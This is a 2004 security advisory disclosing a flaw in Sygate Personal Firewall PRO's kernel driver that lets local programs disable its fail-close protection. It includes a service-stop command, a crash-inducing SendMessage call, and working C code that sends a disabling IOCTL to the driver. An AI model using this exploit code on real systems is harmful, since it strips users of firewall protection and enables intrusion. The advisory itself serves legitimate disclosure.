SIG^2 Vulnerability Research Advisory

Sygate Personal Firewall PRO's Driver May be Disabled Locally by Malicious Programs

by Tan Chew Keong
Release Date: 13 June 2004

Summary

Sygate Personal Firewall PRO (SPFP) has redefined the personal firewall market with a multi-layered shield of network, content, application, and operating system security. Sygate Personal Firewall Pro protects your system from intrusions designed to exploit vulnerabilities in Internet and Intranet communication. It is the ultimate desktop security solution trusted by professionals and relied upon by millions of users.

SPFP has a fail-close feature that can be enabled to block all traffic when the firewall service is not enabled. Hence, if a malicious program kills the firewall service (smc.exe), all traffic will be blocked. However, a flaw in SPFP's driver implementation may be exploited locally to disable this protection.

 
Tested System

Sygate Personal Firewall PRO 5.5 Build 2525 on Win2k SP4

 
Details

SPFP has a fail-close feature that can be enabled to block all traffic when the firewall service is not enabled. Hence, if a malicious program kills the firewall service (smc.exe), all traffic will be blocked. This feature may be enabled from SPFP's GUI menu with the following sequence of commands. (Tools->options->Security Tab->"Block all traffic while the service is not loaded").

SPFP is implemented as a user-space service (smc.exe), and as a kernel-space NDIS intermediate driver (teefer.sys). The driver creates a device named \\device\Teefer. The user-space service (smc.exe, tfman.dll) communicates with the kernel-space driver through this device using specific Device I/O control codes.

The driver does not validate the source of the control codes, and hence, malicious programs may send control codes to the driver to disable it's fail-close protection.

SPFP tries to prevent this by allowing only one user-space program to open it's driver i.e. (Exclusive = TRUE when calling IoCreateDevice). Hence, as long as smc.exe is running, other programs cannot open this driver. However, this may be overcomed in the following two ways.

  1. If the malicious program runs with Administrator privilege, it can simply stop smc.exe using

    1. net stop smcservice
    2. or by using Service Control Manager APIs.

  2. If the malicious program runs with non-administrator privilege, smc.exe may be crashed by exploiting the List-View Control in SPFP's GUI.

    SendMessage(hHdrControl, HDM_GETITEMRECT, 1, (LPARAM)NON-WRITABLE_ADDR);

 
After stopping smc.exe, the fail-close protection may be disabled using the following code.

hDevice = CreateFile("\\\\.\\Teefer", GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if(hDevice == INVALID_HANDLE_VALUE) { printf("Open failed\n"); } else { printf("Device opened.\n"); char buffer[8]; DWORD *ptr = (DWORD *)buffer; DWORD *ptr2 = (DWORD *)(buffer + 4); DWORD ret; *ptr = 0; *ptr2 = 0; if(DeviceIoControl(hDevice, 0x212094, buffer, 8, buffer, 8, &ret, 0)) printf("Sent.\n"); CloseHandle(hDevice); }

 

Vendor Response

Vulnerability will be fixed in upcoming release with additional product engine enhancements and performance tweaks.

 
Disclosure Timeline

20 May 04 - Vulnerability Discovered
30 May 04 - Initial Vendor Notification (CASE ID:Pro-29-May-2004-20:45:17)
08 Jun 04 - Initial Vendor Response
13 Jun 04 - Public Release

 

Contacts

For further questions and enquries, email them to the following.

Overall-in-charge: Tan Chew Keong


Updated: 13/6/2004
webmaster@security.org.sg